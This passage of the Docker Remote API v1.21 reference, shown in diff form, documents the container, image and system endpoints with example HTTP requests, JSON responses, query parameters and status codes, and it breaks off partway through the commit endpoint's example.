+ +**Example request**: + + GET /v1.21/containers/redis1/stats HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "read" : "2015-01-08T22:57:31.547920715Z", + "networks": { + "eth0": { + "rx_bytes": 5338, + "rx_dropped": 0, + "rx_errors": 0, + "rx_packets": 36, + "tx_bytes": 648, + "tx_dropped": 0, + "tx_errors": 0, + "tx_packets": 8 + }, + "eth5": { + "rx_bytes": 4641, + "rx_dropped": 0, + "rx_errors": 0, + "rx_packets": 26, + "tx_bytes": 690, + "tx_dropped": 0, + "tx_errors": 0, + "tx_packets": 9 + } + }, + "memory_stats" : { + "stats" : { + "total_pgmajfault" : 0, + "cache" : 0, + "mapped_file" : 0, + "total_inactive_file" : 0, + "pgpgout" : 414, + "rss" : 6537216, + "total_mapped_file" : 0, + "writeback" : 0, + "unevictable" : 0, + "pgpgin" : 477, + "total_unevictable" : 0, + "pgmajfault" : 0, + "total_rss" : 6537216, + "total_rss_huge" : 6291456, + "total_writeback" : 0, + "total_inactive_anon" : 0, + "rss_huge" : 6291456, + "hierarchical_memory_limit" : 67108864, + "total_pgfault" : 964, + "total_active_file" : 0, + "active_anon" : 6537216, + "total_active_anon" : 6537216, + "total_pgpgout" : 414, + "total_cache" : 0, + "inactive_anon" : 0, + "active_file" : 0, + "pgfault" : 964, + "inactive_file" : 0, + "total_pgpgin" : 477 + }, + "max_usage" : 6651904, + "usage" : 6537216, + "failcnt" : 0, + "limit" : 67108864 + }, + "blkio_stats" : {}, + "cpu_stats" : { + "cpu_usage" : { + "percpu_usage" : [ + 8646879, + 24472255, + 36438778, + 30657443 + ], + "usage_in_usermode" : 50000000, + "total_usage" : 100215355, + "usage_in_kernelmode" : 30000000 + }, + "system_cpu_usage" : 739306590000000, + "throttling_data" : {"periods":0,"throttled_periods":0,"throttled_time":0} + }, + "precpu_stats" : { + "cpu_usage" : { + "percpu_usage" : [ + 8646879, + 24350896, + 36438778, + 30657443 + ], + "usage_in_usermode" : 50000000, + "total_usage" : 100093996, + "usage_in_kernelmode" : 30000000 + }, + "system_cpu_usage" : 9492140000000, + 
"throttling_data" : {"periods":0,"throttled_periods":0,"throttled_time":0} + } + } + +The precpu_stats is the cpu statistic of last read, which is used for calculating the cpu usage percent. It is not the exact copy of the “cpu_stats” field. + +**Query parameters**: + +- **stream** – 1/True/true or 0/False/false, pull stats once then disconnect. Default `true`. + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Resize a container TTY + +`POST /containers/(id or name)/resize` + +Resize the TTY for container with `id`. The unit is number of characters. You must restart the container for the resize to take effect. + +**Example request**: + + POST /v1.21/containers/4fa6e0f0c678/resize?h=40&w=80 HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Length: 0 + Content-Type: text/plain; charset=utf-8 + +**Query parameters**: + +- **h** – height of `tty` session +- **w** – width + +**Status codes**: + +- **200** – no error +- **404** – No such container +- **500** – Cannot resize container + +#### Start a container + +`POST /containers/(id or name)/start` + +Start the container `id` + +> **Note**: +> For backwards compatibility, this endpoint accepts a `HostConfig` as JSON-encoded request body. +> See [create a container](#create-a-container) for details. 
+ +**Example request**: + + POST /v1.21/containers/e90e34656806/start HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Status codes**: + +- **204** – no error +- **304** – container already started +- **404** – no such container +- **500** – server error + +#### Stop a container + +`POST /containers/(id or name)/stop` + +Stop the container `id` + +**Example request**: + + POST /v1.21/containers/e90e34656806/stop?t=5 HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **t** – number of seconds to wait before killing the container + +**Status codes**: + +- **204** – no error +- **304** – container already stopped +- **404** – no such container +- **500** – server error + +#### Restart a container + +`POST /containers/(id or name)/restart` + +Restart the container `id` + +**Example request**: + + POST /v1.21/containers/e90e34656806/restart?t=5 HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **t** – number of seconds to wait before killing the container + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **500** – server error + +#### Kill a container + +`POST /containers/(id or name)/kill` + +Kill the container `id` + +**Example request**: + + POST /v1.21/containers/e90e34656806/kill HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **signal** - Signal to send to the container: integer or string like `SIGINT`. + When not set, `SIGKILL` is assumed and the call waits for the container to exit. 
+ +**Status codes**: + +- **204** – no error +- **404** – no such container +- **500** – server error + +#### Rename a container + +`POST /containers/(id or name)/rename` + +Rename the container `id` to a `new_name` + +**Example request**: + + POST /v1.21/containers/e90e34656806/rename?name=new_name HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **name** – new name for the container + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **409** - conflict name already assigned +- **500** – server error + +#### Pause a container + +`POST /containers/(id or name)/pause` + +Pause the container `id` + +**Example request**: + + POST /v1.21/containers/e90e34656806/pause HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **500** – server error + +#### Unpause a container + +`POST /containers/(id or name)/unpause` + +Unpause the container `id` + +**Example request**: + + POST /v1.21/containers/e90e34656806/unpause HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **500** – server error + +#### Attach to a container + +`POST /containers/(id or name)/attach` + +Attach to the container `id` + +**Example request**: + + POST /v1.21/containers/16253994b7c4/attach?logs=1&stream=0&stdout=1 HTTP/1.1 + +**Example response**: + + HTTP/1.1 101 UPGRADED + Content-Type: application/vnd.docker.raw-stream + Connection: Upgrade + Upgrade: tcp + + {% raw %} + {{ STREAM }} + {% endraw %} + +**Query parameters**: + +- **logs** – 1/True/true or 0/False/false, return logs. Default `false`. +- **stream** – 1/True/true or 0/False/false, return stream. + Default `false`. +- **stdin** – 1/True/true or 0/False/false, if `stream=true`, attach + to `stdin`. Default `false`. 
+- **stdout** – 1/True/true or 0/False/false, if `logs=true`, return + `stdout` log, if `stream=true`, attach to `stdout`. Default `false`. +- **stderr** – 1/True/true or 0/False/false, if `logs=true`, return + `stderr` log, if `stream=true`, attach to `stderr`. Default `false`. + +**Status codes**: + +- **101** – no error, hints proxy about hijacking +- **200** – no error, no upgrade header found +- **400** – bad parameter +- **404** – no such container +- **500** – server error + +**Stream details**: + +When using the TTY setting is enabled in +[`POST /containers/create` +](#create-a-container), +the stream is the raw data from the process PTY and client's `stdin`. +When the TTY is disabled, then the stream is multiplexed to separate +`stdout` and `stderr`. + +The format is a **Header** and a **Payload** (frame). + +**HEADER** + +The header contains the information which the stream writes (`stdout` or +`stderr`). It also contains the size of the associated frame encoded in the +last four bytes (`uint32`). + +It is encoded on the first eight bytes like this: + + header := [8]byte{STREAM_TYPE, 0, 0, 0, SIZE1, SIZE2, SIZE3, SIZE4} + +`STREAM_TYPE` can be: + +- 0: `stdin` (is written on `stdout`) +- 1: `stdout` +- 2: `stderr` + +`SIZE1, SIZE2, SIZE3, SIZE4` are the four bytes of +the `uint32` size encoded as big endian. + +**PAYLOAD** + +The payload is the raw stream. + +**IMPLEMENTATION** + +The simplest way to implement the Attach protocol is the following: + + 1. Read eight bytes. + 2. Choose `stdout` or `stderr` depending on the first byte. + 3. Extract the frame size from the last four bytes. + 4. Read the extracted size and output it on the correct output. + 5. Goto 1. 
+ +#### Attach to a container (websocket) + +`GET /containers/(id or name)/attach/ws` + +Attach to the container `id` via websocket + +Implements websocket protocol handshake according to [RFC 6455](http://tools.ietf.org/html/rfc6455) + +**Example request** + + GET /v1.21/containers/e90e34656806/attach/ws?logs=0&stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1 + +**Example response** + + {% raw %} + {{ STREAM }} + {% endraw %} + +**Query parameters**: + +- **logs** – 1/True/true or 0/False/false, return logs. Default `false`. +- **stream** – 1/True/true or 0/False/false, return stream. + Default `false`. +- **stdin** – 1/True/true or 0/False/false, if `stream=true`, attach + to `stdin`. Default `false`. +- **stdout** – 1/True/true or 0/False/false, if `logs=true`, return + `stdout` log, if `stream=true`, attach to `stdout`. Default `false`. +- **stderr** – 1/True/true or 0/False/false, if `logs=true`, return + `stderr` log, if `stream=true`, attach to `stderr`. Default `false`. + +**Status codes**: + +- **200** – no error +- **400** – bad parameter +- **404** – no such container +- **500** – server error + +#### Wait a container + +`POST /containers/(id or name)/wait` + +Block until container `id` stops, then returns the exit code + +**Example request**: + + POST /v1.21/containers/16253994b7c4/wait HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"StatusCode": 0} + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Remove a container + +`DELETE /containers/(id or name)` + +Remove the container `id` from the filesystem + +**Example request**: + + DELETE /v1.21/containers/16253994b7c4?v=1 HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **v** – 1/True/true or 0/False/false, Remove the volumes + associated to the container. Default `false`. +- **force** - 1/True/true or 0/False/false, Kill then remove the container. 
+ Default `false`. + +**Status codes**: + +- **204** – no error +- **400** – bad parameter +- **404** – no such container +- **409** – conflict +- **500** – server error + +#### Copy files or folders from a container + +`POST /containers/(id or name)/copy` + +Copy files or folders of container `id` + +**Deprecated** in favor of the `archive` endpoint below. + +**Example request**: + + POST /v1.21/containers/4fa6e0f0c678/copy HTTP/1.1 + Content-Type: application/json + + { + "Resource": "test.txt" + } + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/x-tar + + {% raw %} + {{ TAR STREAM }} + {% endraw %} + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Retrieving information about files and folders in a container + +`HEAD /containers/(id or name)/archive` + +See the description of the `X-Docker-Container-Path-Stat` header in the +following section. + +#### Get an archive of a filesystem resource in a container + +`GET /containers/(id or name)/archive` + +Get a tar archive of a resource in the filesystem of container `id`. + +**Query parameters**: + +- **path** - resource in the container's filesystem to archive. Required. + + If not an absolute path, it is relative to the container's root directory. + The resource specified by **path** must exist. To assert that the resource + is expected to be a directory, **path** should end in `/` or `/.` + (assuming a path separator of `/`). If **path** ends in `/.` then this + indicates that only the contents of the **path** directory should be + copied. A symlink is always resolved to its target. + + > **Note**: It is not possible to copy certain system files such as resources + > under `/proc`, `/sys`, `/dev`, and mounts created by the user in the + > container. 
+ +**Example request**: + + GET /v1.21/containers/8cce319429b2/archive?path=/root HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/x-tar + X-Docker-Container-Path-Stat: eyJuYW1lIjoicm9vdCIsInNpemUiOjQwOTYsIm1vZGUiOjIxNDc0ODQwOTYsIm10aW1lIjoiMjAxNC0wMi0yN1QyMDo1MToyM1oiLCJsaW5rVGFyZ2V0IjoiIn0= + + {% raw %} + {{ TAR STREAM }} + {% endraw %} + +On success, a response header `X-Docker-Container-Path-Stat` will be set to a +base64-encoded JSON object containing some filesystem header information about +the archived resource. The above example value would decode to the following +JSON object (whitespace added for readability): + +```json +{ + "name": "root", + "size": 4096, + "mode": 2147484096, + "mtime": "2014-02-27T20:51:23Z", + "linkTarget": "" +} +``` + +A `HEAD` request can also be made to this endpoint if only this information is +desired. + +**Status codes**: + +- **200** - success, returns archive of copied resource +- **400** - client error, bad parameter, details in JSON response body, one of: + - must specify path parameter (**path** cannot be empty) + - not a directory (**path** was asserted to be a directory but exists as a + file) +- **404** - client error, resource not found, one of: + – no such container (container `id` does not exist) + - no such file or directory (**path** does not exist) +- **500** - server error + +#### Extract an archive of files or folders to a directory in a container + +`PUT /containers/(id or name)/archive` + +Upload a tar archive to be extracted to a path in the filesystem of container +`id`. + +**Query parameters**: + +- **path** - path to a directory in the container + to extract the archive's contents into. Required. + + If not an absolute path, it is relative to the container's root directory. + The **path** resource must exist. 
+- **noOverwriteDirNonDir** - If "1", "true", or "True" then it will be an error + if unpacking the given content would cause an existing directory to be + replaced with a non-directory and vice versa. + +**Example request**: + + PUT /v1.21/containers/8cce319429b2/archive?path=/vol1 HTTP/1.1 + Content-Type: application/x-tar + + {% raw %} + {{ TAR STREAM }} + {% endraw %} + +**Example response**: + + HTTP/1.1 200 OK + +**Status codes**: + +- **200** – the content was extracted successfully +- **400** - client error, bad parameter, details in JSON response body, one of: + - must specify path parameter (**path** cannot be empty) + - not a directory (**path** should be a directory but exists as a file) + - unable to overwrite existing directory with non-directory + (if **noOverwriteDirNonDir**) + - unable to overwrite existing non-directory with directory + (if **noOverwriteDirNonDir**) +- **403** - client error, permission denied, the volume + or container rootfs is marked as read-only. +- **404** - client error, resource not found, one of: + – no such container (container `id` does not exist) + - no such file or directory (**path** resource does not exist) +- **500** – server error + +### 2.2 Images + +#### List Images + +`GET /images/json` + +**Example request**: + + GET /v1.21/images/json?all=0 HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "RepoTags": [ + "ubuntu:12.04", + "ubuntu:precise", + "ubuntu:latest" + ], + "Id": "8dbd9e392a964056420e5d58ca5cc376ef18e2de93b5cc90e868a1bbc8318c1c", + "Created": 1365714795, + "Size": 131506275, + "VirtualSize": 131506275, + "Labels": {} + }, + { + "RepoTags": [ + "ubuntu:12.10", + "ubuntu:quantal" + ], + "ParentId": "27cf784147099545", + "Id": "b750fe79269d2ec9a3c593ef05b4332b1d1a02a62b4accb2c21d589ff2f5f2dc", + "Created": 1364102658, + "Size": 24653, + "VirtualSize": 180116135, + "Labels": { + "com.example.version": "v1" + } + } + ] + +**Example request, with digest 
information**: + + GET /v1.21/images/json?digests=1 HTTP/1.1 + +**Example response, with digest information**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "Created": 1420064636, + "Id": "4986bf8c15363d1c5d15512d5266f8777bfba4974ac56e3270e7760f6f0a8125", + "ParentId": "ea13149945cb6b1e746bf28032f02e9b5a793523481a0a18645fc77ad53c4ea2", + "RepoDigests": [ + "localhost:5000/test/busybox@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf" + ], + "RepoTags": [ + "localhost:5000/test/busybox:latest", + "playdate:latest" + ], + "Size": 0, + "VirtualSize": 2429728, + "Labels": {} + } + ] + +The response shows a single image `Id` associated with two repositories +(`RepoTags`): `localhost:5000/test/busybox` and `playdate`. A caller can use +either of the `RepoTags` values `localhost:5000/test/busybox:latest` or +`playdate:latest` to reference the image. + +You can also use `RepoDigests` values to reference an image. In this response, +the array has only one reference and that is to the +`localhost:5000/test/busybox` repository; the `playdate` repository has no +digest. You can reference this digest using the value: +`localhost:5000/test/busybox@sha256:cbbf2f9a99b47fc460d...` + +See the `docker run` and `docker build` commands for examples of digest and tag +references on the command line. + +**Query parameters**: + +- **all** – 1/True/true or 0/False/false, default false +- **filters** – a JSON encoded value of the filters (a map[string][]string) to process on the images list. 
Available filters: + - `dangling=true` + - `label=key` or `label="key=value"` of an image label +- **filter** - only return images with the specified name + +#### Build image from a Dockerfile + +`POST /build` + +Build an image from a Dockerfile + +**Example request**: + + POST /v1.21/build HTTP/1.1 + + {% raw %} + {{ TAR STREAM }} + {% endraw %} + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"stream": "Step 1/5..."} + {"stream": "..."} + {"error": "Error...", "errorDetail": {"code": 123, "message": "Error..."}} + +The input stream must be a `tar` archive compressed with one of the +following algorithms: `identity` (no compression), `gzip`, `bzip2`, `xz`. + +The archive must include a build instructions file, typically called +`Dockerfile` at the archive's root. The `dockerfile` parameter may be +used to specify a different build instructions file. To do this, its value must be +the path to the alternate build instructions file to use. + +The archive may include any number of other files, +which are accessible in the build context (See the [*ADD build +command*](../reference/builder.md#add)). + +The Docker daemon performs a preliminary validation of the `Dockerfile` before +starting the build, and returns an error if the syntax is incorrect. After that, +each instruction is run one-by-one until the ID of the new image is output. + +The build is canceled if the client drops the connection by quitting +or being killed. + +**Query parameters**: + +- **dockerfile** - Path within the build context to the `Dockerfile`. This is + ignored if `remote` is specified and points to an external `Dockerfile`. +- **t** – A name and optional tag to apply to the image in the `name:tag` format. + If you omit the `tag` the default `latest` value is assumed. + You can provide one or more `t` parameters. +- **remote** – A Git repository URI or HTTP/HTTPS context URI. 
If the + URI points to a single text file, the file's contents are placed into + a file called `Dockerfile` and the image is built from that file. If + the URI points to a tarball, the file is downloaded by the daemon and + the contents therein used as the context for the build. If the URI + points to a tarball and the `dockerfile` parameter is also specified, + there must be a file with the corresponding path inside the tarball. +- **q** – Suppress verbose build output. +- **nocache** – Do not use the cache when building the image. +- **pull** - Attempt to pull the image even if an older image exists locally. +- **rm** - Remove intermediate containers after a successful build (default behavior). +- **forcerm** - Always remove intermediate containers (includes `rm`). +- **memory** - Set memory limit for build. +- **memswap** - Total memory (memory + swap), `-1` to enable unlimited swap. +- **cpushares** - CPU shares (relative weight). +- **cpusetcpus** - CPUs in which to allow execution (e.g., `0-3`, `0,1`). +- **cpuperiod** - The length of a CPU period in microseconds. +- **cpuquota** - Microseconds of CPU time that the container can get in a CPU period. +- **buildargs** – JSON map of string pairs for build-time variables. Users pass + these values at build-time. Docker uses the `buildargs` as the environment + context for command(s) run via the Dockerfile's `RUN` instruction or for + variable expansion in other Dockerfile instructions. This is not meant for + passing secret values. [Read more about the buildargs instruction](../reference/builder.md#arg) + +**Request Headers**: + +- **Content-type** – Set to `"application/tar"`. 
+- **X-Registry-Config** – A base64-url-safe-encoded Registry Auth Config JSON + object with the following structure: + + { + "docker.example.com": { + "username": "janedoe", + "password": "hunter2" + }, + "https://index.docker.io/v1/": { + "username": "mobydock", + "password": "conta1n3rize14" + } + } + + This object maps the hostname of a registry to an object containing the + "username" and "password" for that registry. Multiple registries may + be specified as the build may be based on an image requiring + authentication to pull from any arbitrary registry. Only the registry + domain name (and port if not the default "443") are required. However + (for legacy reasons) the "official" Docker, Inc. hosted registry must + be specified with both a "https://" prefix and a "/v1/" suffix even + though Docker will prefer to use the v2 registry API. + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Create an image + +`POST /images/create` + +Create an image either by pulling it from the registry or by importing it + +**Example request**: + + POST /v1.21/images/create?fromImage=busybox&tag=latest HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"status": "Pulling..."} + {"status": "Pulling", "progress": "1 B/ 100 B", "progressDetail": {"current": 1, "total": 100}} + {"error": "Invalid..."} + ... + +When using this endpoint to pull an image from the registry, the +`X-Registry-Auth` header can be used to include +a base64-encoded AuthConfig object. + +**Query parameters**: + +- **fromImage** – Name of the image to pull. The name may include a tag or + digest. This parameter may only be used when pulling an image. +- **fromSrc** – Source to import. The value may be a URL from which the image + can be retrieved or `-` to read the image from the request body. + This parameter may only be used when importing an image. +- **repo** – Repository name given to an image when it is imported. 
+ The repo may include a tag. This parameter may only be used when importing + an image. +- **tag** – Tag or digest. If empty when pulling an image, this causes all tags + for the given image to be pulled. + +**Request Headers**: + +- **X-Registry-Auth** – base64-encoded AuthConfig object + +**Status codes**: + +- **200** – no error +- **404** - repository does not exist or no read access +- **500** – server error + + + +#### Inspect an image + +`GET /images/(name)/json` + +Return low-level information on the image `name` + +**Example request**: + + GET /v1.21/images/example/json HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Id" : "85f05633ddc1c50679be2b16a0479ab6f7637f8884e0cfe0f4d20e1ebb3d6e7c", + "Container" : "cb91e48a60d01f1e27028b4fc6819f4f290b3cf12496c8176ec714d0d390984a", + "Comment" : "", + "Os" : "linux", + "Architecture" : "amd64", + "Parent" : "91e54dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c", + "ContainerConfig" : { + "Tty" : false, + "Hostname" : "e611e15f9c9d", + "Volumes" : null, + "Domainname" : "", + "AttachStdout" : false, + "PublishService" : "", + "AttachStdin" : false, + "OpenStdin" : false, + "StdinOnce" : false, + "NetworkDisabled" : false, + "OnBuild" : [], + "Image" : "91e54dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c", + "User" : "", + "WorkingDir" : "", + "Entrypoint" : null, + "MacAddress" : "", + "AttachStderr" : false, + "Labels" : { + "com.example.license" : "GPL", + "com.example.version" : "1.0", + "com.example.vendor" : "Acme" + }, + "Env" : [ + "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" + ], + "ExposedPorts" : null, + "Cmd" : [ + "/bin/sh", + "-c", + "#(nop) LABEL com.example.vendor=Acme com.example.license=GPL com.example.version=1.0" + ] + }, + "DockerVersion" : "1.9.0-dev", + "VirtualSize" : 188359297, + "Size" : 0, + "Author" : "", + "Created" : "2015-09-10T08:30:53.26995814Z", + "GraphDriver" : { + "Name" : "aufs", + 
"Data" : null + }, + "RepoDigests" : [ + "localhost:5000/test/busybox/example@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf" + ], + "RepoTags" : [ + "example:1.0", + "example:latest", + "example:stable" + ], + "Config" : { + "Image" : "91e54dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c", + "NetworkDisabled" : false, + "OnBuild" : [], + "StdinOnce" : false, + "PublishService" : "", + "AttachStdin" : false, + "OpenStdin" : false, + "Domainname" : "", + "AttachStdout" : false, + "Tty" : false, + "Hostname" : "e611e15f9c9d", + "Volumes" : null, + "Cmd" : [ + "/bin/bash" + ], + "ExposedPorts" : null, + "Env" : [ + "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" + ], + "Labels" : { + "com.example.vendor" : "Acme", + "com.example.version" : "1.0", + "com.example.license" : "GPL" + }, + "Entrypoint" : null, + "MacAddress" : "", + "AttachStderr" : false, + "WorkingDir" : "", + "User" : "" + } + } + +**Status codes**: + +- **200** – no error +- **404** – no such image +- **500** – server error + +#### Get the history of an image + +`GET /images/(name)/history` + +Return the history of the image `name` + +**Example request**: + + GET /v1.21/images/ubuntu/history HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "Id": "3db9c44f45209632d6050b35958829c3a2aa256d81b9a7be45b362ff85c54710", + "Created": 1398108230, + "CreatedBy": "/bin/sh -c #(nop) ADD file:eb15dbd63394e063b805a3c32ca7bf0266ef64676d5a6fab4801f2e81e2a5148 in /", + "Tags": [ + "ubuntu:lucid", + "ubuntu:10.04" + ], + "Size": 182964289, + "Comment": "" + }, + { + "Id": "6cfa4d1f33fb861d4d114f43b25abd0ac737509268065cdfd69d544a59c85ab8", + "Created": 1398108222, + "CreatedBy": "/bin/sh -c #(nop) MAINTAINER Tianon Gravi - mkimage-debootstrap.sh -i iproute,iputils-ping,ubuntu-minimal -t lucid.tar.xz lucid http://archive.ubuntu.com/ubuntu/", + "Tags": null, + "Size": 0, + "Comment": "" + }, + { + "Id": 
"511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158", + "Created": 1371157430, + "CreatedBy": "", + "Tags": [ + "scratch12:latest", + "scratch:latest" + ], + "Size": 0, + "Comment": "Imported from -" + } + ] + +**Status codes**: + +- **200** – no error +- **404** – no such image +- **500** – server error + +#### Push an image on the registry + +`POST /images/(name)/push` + +Push the image `name` on the registry + +**Example request**: + + POST /v1.21/images/test/push HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"status": "Pushing..."} + {"status": "Pushing", "progress": "1/? (n/a)", "progressDetail": {"current": 1}} + {"error": "Invalid..."} + ... + +If you wish to push an image onto a private registry, that image must already have been tagged +into a repository which references that registry `hostname` and `port`. This repository name should +then be used in the URL. This duplicates the command line's flow. + +**Example request**: + + POST /v1.21/images/registry.acme.com:5000/test/push HTTP/1.1 + + +**Query parameters**: + +- **tag** – The tag to associate with the image on the registry. This is optional. + +**Request Headers**: + +- **X-Registry-Auth** – base64-encoded AuthConfig object. 
+ +**Status codes**: + +- **200** – no error +- **404** – no such image +- **500** – server error + +#### Tag an image into a repository + +`POST /images/(name)/tag` + +Tag the image `name` into a repository + +**Example request**: + + POST /v1.21/images/test/tag?repo=myrepo&force=0&tag=v42 HTTP/1.1 + +**Example response**: + + HTTP/1.1 201 Created + +**Query parameters**: + +- **repo** – The repository to tag in +- **force** – 1/True/true or 0/False/false, default false +- **tag** - The new tag name + +**Status codes**: + +- **201** – no error +- **400** – bad parameter +- **404** – no such image +- **409** – conflict +- **500** – server error + +#### Remove an image + +`DELETE /images/(name)` + +Remove the image `name` from the filesystem + +**Example request**: + + DELETE /v1.21/images/test HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-type: application/json + + [ + {"Untagged": "3e2f21a89f"}, + {"Deleted": "3e2f21a89f"}, + {"Deleted": "53b4f83ac9"} + ] + +**Query parameters**: + +- **force** – 1/True/true or 0/False/false, default false +- **noprune** – 1/True/true or 0/False/false, default false + +**Status codes**: + +- **200** – no error +- **404** – no such image +- **409** – conflict +- **500** – server error + +#### Search images + +`GET /images/search` + +Search for an image on [Docker Hub](https://hub.docker.com). + +> **Note**: +> The response keys have changed from API v1.6 to reflect the JSON +> sent by the registry server to the docker daemon's request. 
+ +**Example request**: + + GET /v1.21/images/search?term=sshd HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "description": "", + "is_official": false, + "is_automated": false, + "name": "wma55/u1210sshd", + "star_count": 0 + }, + { + "description": "", + "is_official": false, + "is_automated": false, + "name": "jdswinbank/sshd", + "star_count": 0 + }, + { + "description": "", + "is_official": false, + "is_automated": false, + "name": "vgauthier/sshd", + "star_count": 0 + } + ... + ] + +**Query parameters**: + +- **term** – term to search + +**Status codes**: + +- **200** – no error +- **500** – server error + +### 2.3 Misc + +#### Check auth configuration + +`POST /auth` + +Get the default username and email + +**Example request**: + + POST /v1.21/auth HTTP/1.1 + Content-Type: application/json + + { + "username": "hannibal", + "password": "xxxx", + "email": "hannibal@a-team.com", + "serveraddress": "https://index.docker.io/v1/" + } + +**Example response**: + + HTTP/1.1 200 OK + +**Status codes**: + +- **200** – no error +- **204** – no error +- **500** – server error + +#### Display system-wide information + +`GET /info` + +Display system-wide information + +**Example request**: + + GET /v1.21/info HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "ClusterStore": "etcd://localhost:2379", + "Containers": 11, + "CpuCfsPeriod": true, + "CpuCfsQuota": true, + "Debug": false, + "DockerRootDir": "/var/lib/docker", + "Driver": "btrfs", + "DriverStatus": [[""]], + "ExecutionDriver": "native-0.1", + "ExperimentalBuild": false, + "HttpProxy": "http://test:test@localhost:8080", + "HttpsProxy": "https://test:test@localhost:8080", + "ID": "7TRN:IPZB:QYBB:VPBQ:UMPP:KARE:6ZNR:XE6T:7EWV:PKF4:ZOJD:TPYS", + "IPv4Forwarding": true, + "Images": 16, + "IndexServerAddress": "https://index.docker.io/v1/", + "InitPath": "/usr/bin/docker", + "InitSha1": "", + "KernelVersion": 
"3.12.0-1-amd64", + "Labels": [ + "storage=ssd" + ], + "MemTotal": 2099236864, + "MemoryLimit": true, + "NCPU": 1, + "NEventsListener": 0, + "NFd": 11, + "NGoroutines": 21, + "Name": "prod-server-42", + "NoProxy": "9.81.1.160", + "OomKillDisable": true, + "OperatingSystem": "Boot2Docker", + "RegistryConfig": { + "IndexConfigs": { + "docker.io": { + "Mirrors": null, + "Name": "docker.io", + "Official": true, + "Secure": true + } + }, + "InsecureRegistryCIDRs": [ + "127.0.0.0/8" + ] + }, + "ServerVersion": "1.9.0", + "SwapLimit": false, + "SystemTime": "2015-03-10T11:11:23.730591467-07:00" + } + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Show the docker version information + +`GET /version` + +Show the docker version information + +**Example request**: + + GET /v1.21/version HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Version": "1.5.0", + "Os": "linux", + "KernelVersion": "3.18.5-tinycore64", + "GoVersion": "go1.4.1", + "GitCommit": "a8a31ef", + "Arch": "amd64", + "ApiVersion": "1.20", + "Experimental": false + } + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Ping the docker server + +`GET /_ping` + +Ping the docker server + +**Example request**: + + GET /v1.21/_ping HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: text/plain + + OK + +**Status codes**: + +- **200** - no error +- **500** - server error + +#### Create a new image from a container's changes + +`POST /commit` + +Create a new image from a container's changes + +**Example request**: + + POST /v1.21/commit?container=44c004db4b17&comment=message&repo=myrepo HTTP/1.1 + Content-Type: application/json + + { + "Hostname": "", + "Domainname": "", + "User": "", + "AttachStdin": false, + "AttachStdout": true, + "AttachStderr": true, + "Tty": false, + "OpenStdin": false, + "StdinOnce": false, + "Env": null, + "Cmd": [ + "date" + ], + "Mounts": [ + { + "Source": "/data", + 
